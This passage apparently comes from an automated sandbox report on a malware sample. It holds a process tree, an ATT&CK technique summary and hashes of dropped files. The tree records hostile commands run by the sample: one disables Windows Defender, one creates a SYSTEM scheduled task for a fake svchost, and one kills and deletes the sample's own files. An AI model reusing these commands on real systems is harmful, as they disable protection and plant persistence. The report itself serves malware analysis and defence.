                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                      PID:4500
                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                      PID:5392
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FAB7.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\FAB7.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2100
                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1228
                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:184
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:408
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:1552
                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                            PID:736
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                            PID:5248
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\5B57.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\5B57.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                            PID:1672
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 5B57.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5B57.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5184
                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                  taskkill /im 5B57.exe /f
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:4368
                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:1212
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\726A.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\726A.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:3652
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\A89E.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\A89E.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                              PID:3948
                                                                                                                                                                              • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2824
                                                                                                                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                  schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                  PID:4520
                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                    PID:2100
                                                                                                                                                                                • C:\Windows\System\svchost.exe
                                                                                                                                                                                  "C:\Windows\System\svchost.exe" formal
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  PID:5268
                                                                                                                                                                                  • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4316
                                                                                                                                                                                    • C:\Windows\System\spoolsv.exe
                                                                                                                                                                                      "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:5852
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B1F6.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B1F6.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:416
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BC86.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\BC86.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:852
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\EDC8.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\EDC8.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5584
                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:5700
                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:6116
                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            PID:5668
                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5472
                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4976
                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                PID:1228
                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:5936
                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                  C:\Windows\explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:4816
                                                                                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:5812
                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1772
                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:6108

                                                                                                                                                                                                        Network

                                                                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                        Execution

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Persistence

                                                                                                                                                                                                        Modify Existing Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1031

                                                                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                                                                        2
                                                                                                                                                                                                        T1060

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1197

                                                                                                                                                                                                        Privilege Escalation

                                                                                                                                                                                                        Scheduled Task

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1053

                                                                                                                                                                                                        Defense Evasion

                                                                                                                                                                                                        Modify Registry

                                                                                                                                                                                                        4
                                                                                                                                                                                                        T1112

                                                                                                                                                                                                        Disabling Security Tools

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1089

                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1497

                                                                                                                                                                                                        BITS Jobs

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1197

                                                                                                                                                                                                        Install Root Certificate

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1130

                                                                                                                                                                                                        Credential Access

                                                                                                                                                                                                        Credentials in Files

                                                                                                                                                                                                        4
                                                                                                                                                                                                        T1081

                                                                                                                                                                                                        Discovery

                                                                                                                                                                                                        Query Registry

                                                                                                                                                                                                        6
                                                                                                                                                                                                        T1012

                                                                                                                                                                                                        Virtualization/Sandbox Evasion

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1497

                                                                                                                                                                                                        System Information Discovery

                                                                                                                                                                                                        6
                                                                                                                                                                                                        T1082

                                                                                                                                                                                                        Security Software Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1063

                                                                                                                                                                                                        Peripheral Device Discovery

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1120

                                                                                                                                                                                                        Collection

                                                                                                                                                                                                        Data from Local System

                                                                                                                                                                                                        4
                                                                                                                                                                                                        T1005

                                                                                                                                                                                                        Command and Control

                                                                                                                                                                                                        Web Service

                                                                                                                                                                                                        1
                                                                                                                                                                                                        T1102

                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a5f4ae283ff270eb3887600fb10c1773

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a68ee513b3f62259b88793e0f3e7dbd864979331

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          98e0a037573aa2edc81dd714fe366632f318d9e7da87b5725d3d44b4bebad9e3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          13dc05ec5dd2878efbd9063ef983211b57e5b533d3358bea055f34ea870883b0cf559d961f5f53d7b6d4ce1d3422a50776925a9fcccaf9558916f92b66e45d35

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          13ea31ffc7c2daec89a696b2ea77e5b1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          61ea8f2c663fca319a8bcee8234082e145e27cd9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          f9711c5eb382942a84e44c29691f9afec882faa0192e4149eb2b8660e0c29c3a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          14504a15c16af0f094fd27bfa6211d10cc50da472baf17b5a25fa1e680f0f9ff794b9fa6c5c98938300026cf3f1fd18f5a122523f1fa6c86da36205683429ad2

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          4d4e2539062d39c85ced038820ed388a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          d2b000c53fd6c24906b9df156fdf0eaa75e07984

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          73a33ed2005d6590e98cf9d423d585ce58cee6ecc3f0d208c1f911a134ba4829

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          e33fbe429c80253faf38068ed5599dc4ebbdfc8a451e8191450d35d5d02f08f62bee17c2024156d3317b50a74fb87697a4bfc9b320c5104a243ccb07bbb1e270

                                                                                                                                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a53ff1f94057570b7a0efd91580109a6

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          7ccf883cb485ee9fbe096ed960077fd728a8527d

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          c7bdd127672a9dc28520c7a73ea5a1924feb7d186ed8a93af4ea9ea22f47ea47

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          157da4b21b2aa3a84bd89005f0dec04c06971f5caaaf90020aefab1a4c7796a9769a913088342f51bc471aa5624d067a7b5bcd2c72286d89f58fee57d3461dff

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\libcurl.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\libcurlpp.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\libgcc_s_dw2-1.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\libstdc++-6.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\libwinpthread-1.dll
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\setup_install.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_1.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_1.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_2.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_2.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_3.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_3.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ee658be7ea7269085f4004d68960e547

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_4.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_4.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_5.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_5.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_6.exe
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS087BBC94\sonia_6.txt
                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                                                          SHA512

